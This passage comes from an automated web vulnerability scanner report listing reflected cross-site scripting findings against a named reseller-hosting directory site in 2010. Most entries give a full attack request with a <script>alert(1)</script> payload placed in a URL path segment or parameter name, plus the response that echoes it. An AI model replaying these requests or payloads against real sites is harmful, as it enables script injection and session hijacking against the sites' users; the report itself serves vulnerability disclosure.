<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild6c98<script>alert(1)</script>fe099c9d811/8/ was not found on this server.</p>
...[SNIP]...

2.3641. http://www.resellerbase.com/detail/8/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 41ac5<script>alert(1)</script>5c3683e9746 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/841ac5<script>alert(1)</script>5c3683e9746/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/841ac5<script>alert(1)</script>5c3683e9746/ was not found on this server.</p>
...[SNIP]...

2.3642. http://www.resellerbase.com/detail/8/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 26443<script>alert(1)</script>af687b31670 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/?26443<script>alert(1)</script>af687b31670=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/?26443<script>alert(1)</script>af687b31670=1 was not found on this server.</p>
...[SNIP]...

2.3643. http://www.resellerbase.com/detail/8/hostcentric-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/hostcentric-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 429ca<script>alert(1)</script>df098698d7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail429ca<script>alert(1)</script>df098698d7b/8/hostcentric-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail429ca<script>alert(1)</script>df098698d7b/8/hostcentric-com.html was not found on this server.</p>
...[SNIP]...

2.3644. http://www.resellerbase.com/detail/8/hostcentric-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/8/hostcentric-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8d654<a>eb2b72d9659 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/88d654<a>eb2b72d9659/hostcentric-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/hot.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/88d654<a>eb2b72d9659/hostcentric-com.html was not found on this server.</p>
...[SNIP]...

2.3645. http://www.resellerbase.com/detail/8/hostcentric-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/hostcentric-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5fa2c<script>alert(1)</script>dd433a592a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/5fa2c<script>alert(1)</script>dd433a592a2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/5fa2c<script>alert(1)</script>dd433a592a2 was not found on this server.</p>
...[SNIP]...

2.3646. http://www.resellerbase.com/detail/8/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d06cc<script>alert(1)</script>55f0474fb6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild06cc<script>alert(1)</script>55f0474fb6a/8/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild06cc<script>alert(1)</script>55f0474fb6a/8/rating.php was not found on this server.</p>
...[SNIP]...

2.3647. http://www.resellerbase.com/detail/8/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 849a0<script>alert(1)</script>2cb195251b0529481 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail849a0<script>alert(1)</script>2cb195251b0529481/8/rating.php?id=8&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail849a0<script>alert(1)</script>2cb195251b0529481/8/rating.php?id=8&rating=5 was not found on this server.</p>
...[SNIP]...

2.3648. http://www.resellerbase.com/detail/8/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7dd86<script>alert(1)</script>abd1a76dd7c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/87dd86<script>alert(1)</script>abd1a76dd7c/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/87dd86<script>alert(1)</script>abd1a76dd7c/rating.php was not found on this server.</p>
...[SNIP]...

2.3649. http://www.resellerbase.com/detail/8/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 96eed<script>alert(1)</script>56396eb92a58b766d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, enabling easier demonstration and delivery of the attack.

Request

GET /detail/896eed<script>alert(1)</script>56396eb92a58b766d/rating.php?id=8&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/896eed<script>alert(1)</script>56396eb92a58b766d/rating.php?id=8&rating=5 was not found on this server.</p>
...[SNIP]...

2.3650. http://www.resellerbase.com/detail/8/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1e9ee<script>alert(1)</script>21ce79ee91b51654b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, enabling easier demonstration and delivery of the attack.

Request

GET /detail/8/rating.php1e9ee<script>alert(1)</script>21ce79ee91b51654b?id=8&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/rating.php1e9ee<script>alert(1)</script>21ce79ee91b51654b?id=8&rating=5 was not found on this server.</p>
...[SNIP]...

2.3651. http://www.resellerbase.com/detail/8/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d405e<script>alert(1)</script>229ebb9f6a8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/rating.phpd405e<script>alert(1)</script>229ebb9f6a8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/rating.phpd405e<script>alert(1)</script>229ebb9f6a8 was not found on this server.</p>
...[SNIP]...

2.3652. http://www.resellerbase.com/detail/8/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4af03<script>alert(1)</script>71919995622773e98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, enabling easier demonstration and delivery of the attack.

Request

GET /detail/8/rating.php/4af03<script>alert(1)</script>71919995622773e98?id=8&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/rating.php/4af03<script>alert(1)</script>71919995622773e98?id=8&rating=5 was not found on this server.</p>
...[SNIP]...

2.3653. http://www.resellerbase.com/detail/8/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9da6a<script>alert(1)</script>f3b953a1df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/rating.php?9da6a<script>alert(1)</script>f3b953a1df=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/rating.php?9da6a<script>alert(1)</script>f3b953a1df=1 was not found on this server.</p>
...[SNIP]...

2.3654. http://www.resellerbase.com/detail/8/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2d1e3<script>alert(1)</script>a6d3aafe94a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2d1e3<script>alert(1)</script>a6d3aafe94a/8/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2d1e3<script>alert(1)</script>a6d3aafe94a/8/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3655. http://www.resellerbase.com/detail/8/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e4915<script>alert(1)</script>2676a3e5a55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8e4915<script>alert(1)</script>2676a3e5a55/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8e4915<script>alert(1)</script>2676a3e5a55/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3656. http://www.resellerbase.com/detail/8/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 29e01<script>alert(1)</script>4084cabcea4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/search.php29e01<script>alert(1)</script>4084cabcea4?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/search.php29e01<script>alert(1)</script>4084cabcea4?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3657. http://www.resellerbase.com/detail/8/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/8/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload f3e0b<a>fdf2f500b3a was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/search.php?keyword=search...&Submit3=Searchf3e0b<a>fdf2f500b3a&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/search.php?keyword=search...&Submit3=Searchf3e0b<a>fdf2f500b3a&opt=2 was not found on this server.</p>
...[SNIP]...

2.3658. http://www.resellerbase.com/detail/8/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/8/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload aedc9<a>781a60a5f1c was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/search.php?keyword=search...aedc9<a>781a60a5f1c&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/search.php?keyword=search...aedc9<a>781a60a5f1c&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3659. http://www.resellerbase.com/detail/8/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 990bf<script>alert(1)</script>c53230b72bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/search.php?keyword=search...&Submit3=Search&opt=2&990bf<script>alert(1)</script>c53230b72bd=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

